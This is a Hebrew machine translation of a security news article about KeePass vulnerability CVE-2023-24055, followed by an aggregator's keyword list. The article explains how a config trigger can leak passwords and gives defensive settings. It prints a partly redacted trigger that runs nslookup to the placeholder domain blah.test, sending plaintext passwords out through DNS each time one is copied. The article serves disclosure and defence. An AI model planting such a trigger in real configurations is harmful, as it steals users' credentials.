זה היה כמה שבועות ראויים לחדשות עבור מנהלי סיסמאות - אותם כלי עזר שימושיים שעוזרים לך למצוא סיסמה שונה עבור כל אתר אינטרנט שבו אתה משתמש, ולאחר מכן לעקוב אחר כולם.
בסוף 2022, הגיע תורה של LastPass להיות בכל החדשות, כשהחברה הודתה סוף סוף שפריצה שספגה באוגוסט 2022 אכן הסתיימה עם הסיסמה של הלקוחות כספות נגנבות משירות הענן שבו הם גובו.
(הסיסמאות עצמן לא נגנבו, כי הכספות היו מוצפנות, ול-LastPass לא היו עותקים של "מפתח ראשי" של אף אחד עבור קבצי כספת הגיבוי עצמם, אבל זה היה גילוח קרוב יותר ממה שרוב האנשים שמחו לשמוע.)
ואז הגיע תורה של LifeLock להיות בכל החדשות, כשהחברה הזהירה על מה שנראה כמו פריחה של התקפות ניחוש סיסמאות, כנראה על סמך סיסמאות שנגנבו מאתר אחר לגמרי, אולי לפני זמן מה, ואולי נרכשו ברשת האפלה לאחרונה.
LifeLock עצמה לא נפרצה, אבל חלק מהמשתמשים שלה היו, הודות להתנהגות שיתוף סיסמאות שנגרמה מסיכונים שאולי אפילו לא זוכרים שלקחו.
גם המתחרים 1Password ו-BitWarden היו בחדשות לאחרונה, בהתבסס על דיווחים על פרסומות זדוניות, ששודרו ככל הנראה מבלי משים על ידי גוגל, שפיתו משתמשים באופן משכנע לשכפל דפי כניסה שמטרתם לטשטש את פרטי החשבון שלהם.
עכשיו תורו של KeePass להיות בחדשות, הפעם לסוגיית אבטחת סייבר נוספת: לכאורה פגיעות, מונח הז'רגון המשמש לבאגים בתוכנה המובילים לחורים באבטחת סייבר שתוקפים עשויים להיות מסוגלים לנצל למטרות מרושעות.
הרחת סיסמאות קלה
אנחנו מתייחסים לזה בתור א פגיעות כאן כי יש לו מזהה באג רשמי, שהונפק על ידי המכון הלאומי האמריקאי לתקנים וטכנולוגיה.
הבאג קיבל דיבוב CVE-2023-24055: תוקף שיש לו גישת כתיבה לקובץ תצורת ה-XML [יכול] להשיג את סיסמאות הטקסט הבהיר על ידי הוספת טריגר ייצוא.
הטענה לגבי היכולת להשיג סיסמאות ברורות, למרבה הצער, נכונה.
אם יש לי גישת כתיבה לקבצים האישיים שלך, כולל מה שנקרא שלך %APPDATA%
בספרייה, אני יכול לשנות את קטע התצורה בצורה ערמומית כדי לשנות כל הגדרות KeePass שכבר התאמת אישית, או להוסיף התאמות אישיות אם לא שינית משהו ביודעין...
... ובאופן מפתיע אני יכול לגנוב בקלות את סיסמאות הטקסט הפשוט שלך, בכמויות גדולות, למשל על ידי השלכת מסד הנתונים כולו כקובץ CSV לא מוצפן, או תוך כדי שימוש בהם, למשל על ידי הגדרת "הוק לתוכנית" המופעל בכל פעם שאתה ניגש ל- סיסמה ממסד הנתונים.
שימו לב שאני לא צריך מנהל הרשאות, כי אני לא צריך להתעסק עם ספריית ההתקנה בפועל שבה מאוחסנת אפליקציית KeePass, שהיא בדרך כלל אסורה למשתמשים רגילים
ואני לא צריך גישה לכל הגדרות תצורה גלובליות נעולות.
מעניין לציין כי KeePass יוצאת מגדרה כדי למנוע את ריחרוח הסיסמאות שלך כשאתה משתמש בהן, כולל שימוש בטכניקות הגנה מפני חבלה כדי לעצור טריקים שונים נגד Keylogger אפילו ממשתמשים שכבר יש להם סמכויות מערכת.
אבל תוכנת KeePass גם מקלה בצורה מפתיעה על ללכוד נתוני סיסמאות בטקסט רגיל, אולי בדרכים שאתה עשוי להחשיב "קל מדי", אפילו עבור מי שאינם מנהלי מערכת.
זו הייתה עבודה של דקה להשתמש ב-KeePass GUI כדי ליצור א הדק אירוע שיפעל בכל פעם שאתה מעתיק סיסמה ללוח, וכדי להגדיר את האירוע הזה לבצע חיפוש DNS שכלל גם את שם המשתמש וגם את הסיסמה הפשוטה המדוברת:
לאחר מכן נוכל להעתיק את הגדרת ה-XML לא נורא ברורה עבור האפשרות הזו מתוך קובץ התצורה המקומי שלנו לקובץ התצורה של משתמש אחר במערכת, ולאחר מכן גם הם ימצאו את הסיסמאות שלהם דולפות דרך האינטרנט באמצעות חיפושי DNS.
למרות שנתוני תצורת ה-XML הם ברובם קריאים ואינפורמטיביים, KeePass משתמש בסקרנות במחרוזות נתונים אקראיות הידועות כ-GUIDs (קיצור של מזהים ייחודיים בעולם) לציון השונות הדק הגדרות, כך שאפילו משתמש מודע היטב יזדקק לרשימת הפניות נרחבת כדי להבין אילו טריגרים מוגדרים וכיצד.
כך נראה הטריגר לדליפת ה-DNS שלנו, אם כי ביצענו חלק מהפרטים כך שלא תוכל להגיע לשום שובבות מיידית רק על ידי העתקה והדבקה של הטקסט הזה ישירות:
XXXXXXXXXXXXXXXXXXXXX עותק לגנוב דברים דרך חיפושי DNS XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXXX.XXXX.blah.test נָכוֹן 1
כשהטריגר הזה פעיל, גישה לסיסמת KeePass גורמת לטקסט הפשוט לדלוף החוצה בחיפוש DNS לא פולשני לדומיין לפי בחירתי, שהוא blah.test
בדוגמה זו.
שימו לב שתוקפים מהחיים האמיתיים היו כמעט בוודאות לטרוף או לטשטש את הטקסט הגנוב, מה שלא רק יקשה על הזיהוי מתי מתרחשות דליפות DNS, אלא גם יטפלו בסיסמאות המכילות תווים שאינם ASCII, כגון אותיות מודגשות או אימוג'י. שלא ניתן להשתמש אחרת בשמות DNS:
אבל האם זה באמת באג?
עם זאת, השאלה המסובכת היא, "האם זה באמת באג, או שמא זו רק תכונה רבת עוצמה שיכולה להיות מנוצלת על ידי מישהו שכבר יזדקק לפחות שליטה על הקבצים הפרטיים שלך כמו שיש לך בעצמך?"
במילים פשוטות, האם זו פגיעות אם מישהו שכבר יש לו שליטה על החשבון שלך יכול להתעסק עם קבצים שהחשבון שלך אמור להיות מסוגל לגשת אליהם בכל מקרה?
למרות שאתה יכול לקוות שמנהל סיסמה יכלול הרבה שכבות נוספות של הגנה מפני חבלה כדי להקשות על ניצול לרעה של באגים/תכונות מסוג זה, צריך CVE-2023-24055 באמת להיות פגיעות הרשומה ב-CVE?
אם כן, לא היו פקודות כגון DEL
(מחק קובץ) ו FORMAT
צריכים להיות גם "באגים"?
והאם עצם קיומה של PowerShell, מה שהופך התנהגות שעלולה להיות מסוכנת להרבה יותר קל לעורר (נסה powerhsell get-clipboard
, למשל), להיות פגיעות בפני עצמה?
זו העמדה של KeePass, המאושרת על ידי הטקסט הבא שנוסף ל- פרט "באג". באתר של NIST:
** שנוי במחלוקת ** […] הערה: עמדת הספק היא שמסד הנתונים של הסיסמאות לא נועד להיות מאובטח מפני תוקף שיש לו רמת גישה זו למחשב המקומי.
מה לעשות?
אם אתה משתמש KeePass עצמאי, אתה יכול לבדוק אם יש טריגרים סוררים כמו "גנבת ה-DNS" שיצרנו למעלה על ידי פתיחת אפליקציית KeePass ועיון ב כלים > טריגרים... חַלוֹן:
שים לב שאתה יכול להפוך את כולו הדק המערכת כבויה מהחלון הזה, פשוט על ידי ביטול הבחירה של [ ] Enable trigger system
אוֹפְּצִיָה…
...אבל זו לא הגדרה גלובלית, אז ניתן להפעיל אותה מחדש דרך קובץ התצורה המקומי שלך, ולכן רק מגן עליך מפני טעויות, ולא מפני תוקף עם גישה לחשבון שלך.
אתה יכול לכבות את האפשרות עבור כל מי שנמצא במחשב, ללא אפשרות עבורם להפעיל אותה בחזרה על עצמם, על ידי שינוי קובץ ה"נעילה" העולמי KeePass.config.enforced.XML
, נמצא בספרייה שבה מותקנת תוכנית האפליקציה עצמה.
מפעילים ייאלצו לכבות עבור כולם אם קובץ אכיפת ה-XML הגלובלי שלך ייראה כך:
שֶׁקֶר
(במקרה שאתה תוהה, לתוקף שיש לו גישת כתיבה לספריית היישומים כדי להפוך את השינוי הזה יהיה כמעט בוודאות מספיק כוח ברמת המערכת כדי לשנות את קובץ ההפעלה KeePass עצמו, או להתקין ולהפעיל keylogger עצמאי בכל מקרה.)
אם אתה מנהל רשת שמוטל עליו לנעול את KeePass במחשבי המשתמשים שלך כך שהוא עדיין גמיש מספיק כדי לעזור להם, אבל לא מספיק גמיש כדי שהם יוכלו לעזור לפושעי סייבר בטעות, אנו ממליצים לקרוא את ה-KeePass סוגיות אבטחה דף, מפעיל עמוד, ואת תצורה נכפת עמוד.
- הפצת תוכן ויחסי ציבור מופעל על ידי SEO. קבל הגברה היום.
- Platoblockchain. Web3 Metaverse Intelligence. ידע מוגבר. גישה כאן.
- מקור: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- יכול
- אודות
- מֵעַל
- מוּחלָט
- גישה
- גישה
- חֶשְׁבּוֹן
- פעיל
- הוסיף
- הודה
- מודעות
- לאחר
- נגד
- תעשיות
- כביכול
- כְּבָר
- ו
- אחר
- האפליקציה
- בקשה
- אוגוסט
- מחבר
- המכונית
- בחזרה
- מגובה
- רקע תמונה
- גיבוי
- מבוסס
- כי
- להיות
- גבול
- תַחתִית
- הפרה
- חרק
- באגים
- ללכוד
- אשר
- מקרה
- גרם
- גורמים
- מרכז
- בהחלט
- שינוי
- תווים
- לבדוק
- בחירה
- לטעון
- קרוב יותר
- ענן
- צֶבַע
- איך
- חברה
- לחלוטין
- המחשב
- מחשבים
- תנאים
- תְצוּרָה
- לשקול
- לִשְׁלוֹט
- עותקים
- יכול
- לכסות
- לִיצוֹר
- נוצר
- Cve
- עברייני אינטרנט
- אבטחת סייבר
- מסוכן
- כהה
- אינטרנט אפל
- נתונים
- מסד נתונים
- פרטים
- DID
- אחר
- ישירות
- לְהַצִיג
- DNS
- תחום
- לא
- מטה
- דיבוב
- קל יותר
- בקלות
- או
- מוצפן
- אַכִיפָה
- מספיק
- שלם
- אֲפִילוּ
- אירוע
- כל
- כולם
- דוגמה
- לנצל
- יצוא
- נרחב
- נוסף
- מאפיין
- מעטים
- שלח
- קבצים
- בסופו של דבר
- גמיש
- הבא
- להכריח
- מצא
- החל מ-
- לקבל
- מקבל
- גלוֹבָּלִי
- Goes
- שימושי
- שמח
- יש
- גובה
- לעזור
- כאן
- חורים
- לקוות
- לרחף
- איך
- אולם
- HTML
- HTTPS
- מזהה
- מיידי
- in
- לכלול
- כלול
- כולל
- אִינפוֹרמָטִיבִי
- להתקין
- למשל
- מכון
- אינטרנט
- סוגיה
- הפיקו
- IT
- עצמו
- בז'רגון
- שמור
- ידוע
- במידה רבה
- LastPass
- שכבות
- עוֹפֶרֶת
- לדלוף
- דליפות
- רמה
- רשימה
- מקומי
- נראה
- נראה
- בדיקה
- עשוי
- לעשות
- עושה
- מנהל
- מנהלים
- שולים
- max-width
- יכול
- טעות
- טעויות
- לשנות
- רוב
- שמות
- לאומי
- צורך
- רשת
- חדשות
- ניסט
- נוֹרמָלִי
- להשיג
- רשמי
- פתיחה
- אפשרות
- אַחֶרֶת
- שֶׁלוֹ
- פרמטר
- סיסמה
- סיסמאות
- פול
- PC
- אֲנָשִׁים
- אוּלַי
- אישי
- דיוג
- טקסט רגיל
- אפלטון
- מודיעין אפלטון
- אפלטון נתונים
- עמדה
- הודעות
- פוטנציאל
- כּוֹחַ
- חזק
- כוחות
- PowerShell
- פְּרָטִי
- הרשאות
- כנראה
- תָכְנִית
- נרכש
- למטרות
- גם
- שאלה
- אקראי
- פריחה
- קריאה
- לאחרונה
- להמליץ
- רגיל
- לזכור
- תגובה
- דווח
- דוחות לדוגמא
- להפוך
- סיכונים
- הפעלה
- סעיף
- לבטח
- תחושה
- שרות
- סט
- הצבה
- הגדרות
- קצר
- צריך
- בפשטות
- So
- תוכנה
- מוצק
- כמה
- מישהו
- מסחרי
- עצמאי
- תקנים
- עוד
- גָנוּב
- עצור
- מאוחסן
- כזה
- אמור
- SVG
- מערכת
- לקחת
- טכניקות
- טכנולוגיה
- השמיים
- שֶׁלָהֶם
- עצמם
- לכן
- דרך
- זמן
- ל
- גַם
- חלק עליון
- לעקוב
- מַעֲבָר
- שָׁקוּף
- להפעיל
- נָכוֹן
- תור
- הסתובב
- בדרך כלל
- ייחודי
- כתובת האתר
- us
- להשתמש
- משתמש
- משתמשים
- כלי עזר
- שונים
- קמרון
- קמרונות
- באמצעות
- פגיעות
- W3
- דרכים
- אינטרנט
- אתר
- שבועות
- מה
- אשר
- מי
- יצטרך
- תוהה
- תיק עבודות
- היה
- לכתוב
- XML
- עצמך
- זפירנט